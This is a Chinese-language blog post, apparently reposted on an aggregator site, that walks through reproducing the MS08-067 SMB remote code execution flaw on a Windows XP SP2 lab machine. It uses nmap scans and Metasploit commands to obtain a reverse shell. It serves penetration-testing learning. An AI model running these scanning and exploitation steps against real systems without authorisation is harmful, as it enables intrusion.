Windows XP SP2 (Simplified Chinese MS08_067漏洞复现)

这篇具有很好参考价值的文章主要介绍了Windows XP SP2 (Simplified Chinese MS08_067漏洞复现)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、漏洞详情

MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,以SYSTEM权限执行任意指令。

二、靶机搭建

kali

xp系统漏洞,漏洞复现集合,windows,系统安全,网络,安全

Windows XP SP2 (Simplified Chinese )

下载平台:

https://next.itellyou.cn/Original/

xp系统漏洞,漏洞复现集合,windows,系统安全,网络,安全

下载链接:

ed2k://|file|sc_winxp_pro_with_sp2.iso|629227520|505B810E128351482AF8B83AC4D04FD2|/

xp系统漏洞,漏洞复现集合,windows,系统安全,网络,安全

(1)、配置IP:xp系统漏洞,漏洞复现集合,windows,系统安全,网络,安全

(2)、关闭防火墙:
xp系统漏洞,漏洞复现集合,windows,系统安全,网络,安全

三、利用nmap对靶机扫描

(1)、利用nmap探测主机存活:

注:发现Windows XP SP2 (Simplified Chinese)的IP:172.16.12.101

nmap -sP -T4 172.16.12.0/24

xp系统漏洞,漏洞复现集合,windows,系统安全,网络,安全

(2)、利用nmap自带脚本对目标IP扫描:

nmap -sT -A --script=vuln -P0 172.16.12.101

注:发现Windows XP SP2 (Simplified Chinese)存在多个漏洞:ms17-010,ms08-067,且目标靶机445端口开放,但是我们现在只考虑ms08-067。

xp系统漏洞,漏洞复现集合,windows,系统安全,网络,安全

四、漏洞利用

(1)、搜索 MS08_067漏洞:

search ms08

xp系统漏洞,漏洞复现集合,windows,系统安全,网络,安全

(2)、选择MS08_067漏洞:

use  0

xp系统漏洞,漏洞复现集合,windows,系统安全,网络,安全

(3)、查看MS08_067漏洞的payloads:

show payloads

xp系统漏洞,漏洞复现集合,windows,系统安全,网络,安全

(4)、选择42号payload:

set  payload 42

xp系统漏洞,漏洞复现集合,windows,系统安全,网络,安全

(5)、查看MS08_067漏洞所适用的Windows版本:

show targets

xp系统漏洞,漏洞复现集合,windows,系统安全,网络,安全

(6)、设置对应的目标靶机Windows版本:

set target  10

xp系统漏洞,漏洞复现集合,windows,系统安全,网络,安全

(7)、查看payload的详细信息:

show options

xp系统漏洞,漏洞复现集合,windows,系统安全,网络,安全

(8)、配置靶机ip,靶机开放端口,反向连接地址为攻击机ip,设置攻击机监听tcp端口号:
注:通过nmap得知靶机开放端口为445,所以默认设置。反向连接地址为攻击机ip,攻击机监听tcp端口号默认设置

set rhosts  172.16.12.101

xp系统漏洞,漏洞复现集合,windows,系统安全,网络,安全

(9)、初始化攻击环境,并开始对目标靶机进行攻击:

exploit 

xp系统漏洞,漏洞复现集合,windows,系统安全,网络,安全

(10)、进入目标系统的互交命令行shll中:

shell

xp系统漏洞,漏洞复现集合,windows,系统安全,网络,安全

(1)、用ipconfig验证:

ipconfig

xp系统漏洞,漏洞复现集合,windows,系统安全,网络,安全

五、总结

写到这里,这篇文章就介绍结束了,通过本次实验我们复现了MS08-067远程代码执行漏洞,涉及漏洞发现、验证漏洞、利用漏洞的完整过程,并利用Metasploit工具进行shell反弹及深入理解.
这也是我初入渗透测试的第一次漏洞复现,以后再接再厉,祝大家学而不缀!文章来源地址https://www.toymoban.com/news/detail-741052.html

到了这里,关于Windows XP SP2 (Simplified Chinese MS08_067漏洞复现)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Kali之MSF的MS08-067漏洞复现详解

    MSF即Metasploit Framework,是一个综合性的渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具。 目前安装的kali都自带MSF,可以直接在图形界面打开 也可以在kali的终端通过使用命令msfconsole来打开。 1)msf的安装目录: ┌──(kali㉿kali)-[~] └─$ ls /usr/shar

    2023年04月08日
    浏览(51)
  • ms08-067漏洞的复现及所遇到的问题分析

           靶机             Windows XP Service Pack 3         IP地址:192.168.244.133      攻击机                         Kali        IP地址:192.168.244.138 1、执行命令: msfconsole 2、执行命令: search ms08-067 3、执行命令: use 0 或 use exploit/windows/smb/ms08_067_netapi 4、执行命令: sho

    2023年04月20日
    浏览(39)
  • Scrum Guide Chinese Simplified.pdf

    敏捷指南                        

    2024年02月11日
    浏览(116)
  • Oracle修改字符集为SIMPLIFIED CHINESE_CHINA.ZHS16GBK

    查询字符集 修改前字符集为:SIMPLIFIED CHINESE_CHINA.AL32UTF8 SQL shutdown immediate; Database closed. Database dismounted. ORACLE instance shut down. SQL startup mount; ORACLE instance started. Total System Global Area 5027385344 bytes Fixed Size 2261888 bytes Variable Size 1006636160 bytes Database Buffers 4009754624 bytes Redo Buffers 8732672

    2024年02月11日
    浏览(38)
  • IDEA 安装汉化包失败解决方法(Plugin “Chinese (Simplified) Language Pack / 中文语言包“ was not installed: Invalid fil)

    服务器与idea显示版本不一致 进入官网Chinese (Simplified) Language Pack / 中文语言包 - IntelliJ IDEs Plugin | Marketplace (jetbrains.com)找到对应版本的汉化包,下载到电脑idea对应的plugins路径(如下,注意一定要下载到这个路径下才可以正常安装使用,下载到其他路径的话仍然会提示安装失败

    2024年02月09日
    浏览(42)
  • 麒麟v10sp2 arm系统安装rabbitmq

    关于RabbitMQ与Erlang版本对应关系,参见:https://www.rabbitmq.com/which-erlang.html Erlang源码安装包下载地址:https://github.com/erlang/otp/releases RabbitMQ源码安装包下载地址:https://github.com/rabbitmq/rabbitmq-server/releases 需要的软件包 otp_src_26.1.2.tar.gz rabbitmq-server-generic-unix-3.12.9.tar.xz 一、安装依赖

    2024年04月27日
    浏览(41)
  • 制作麒麟kylinV10SP2自动安装系统的镜像文件

    (目的)通过kickstart方式自动安装麒麟kylinV10SP2系统 一、安装一台kylinV10SP2虚拟机     虚拟机的作的是,定制kickstart自动安装ISO镜像     1:新建虚拟机,安装kylinV10SP2         workstations15Pro新建虚拟机,         使用ISO镜像(Kylin-Server-10-SP2-x86-Release-Build09-20210524.iso),   

    2024年02月07日
    浏览(133)
  • Spread for Winform 16.2.20231.0 (SP2) Crack

      Spread for Winform  16.2.20231.0 (SP2)发布。此版本包含针对客户报告的问题的重要修复: 安装版本 16 后,FarPoint.Localization.dll 将丢失。 将数据绑定到 Spread 时会出现 InvalidOperationException。 通过 Spread Designer 设置的上标将不会保留。 在某些情况下会触发 ExcecutionEngineException。 ToInd

    2024年02月15日
    浏览(238)
  • Windows系统漏洞MS12-020

    使用虚拟机windows 2003和kali 首先查看windows server 2003和kali的IP   (1)通过kali的工具NMAP对目标主机192.168.78.133端口3389进行扫描,输入nmap -193.168.78.133 –p 3389,参数-p:用于扫描指定端口  (2)在kali中运行msfconsole,启动Metasploit (3)在Metasploit中,输入search ms12_020搜索漏洞相关模

    2024年02月03日
    浏览(38)
  • 银河麒麟V10sp2桌面系统安装使用qt5

    本文将介绍如何在国产操作系统银河麒麟上安装qt5并运行一个简单的qt工程 qt的安装目前有两种方式 1、qt官网下载对应的二进制安装文件进行安装 下载地址:https://download.qt.io/archive/qt/ 只用下载.run文件,赋予可执行权限,并执行该文件 2、直接在软件商店搜索qtcreator软件进行

    2024年02月05日
    浏览(81)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包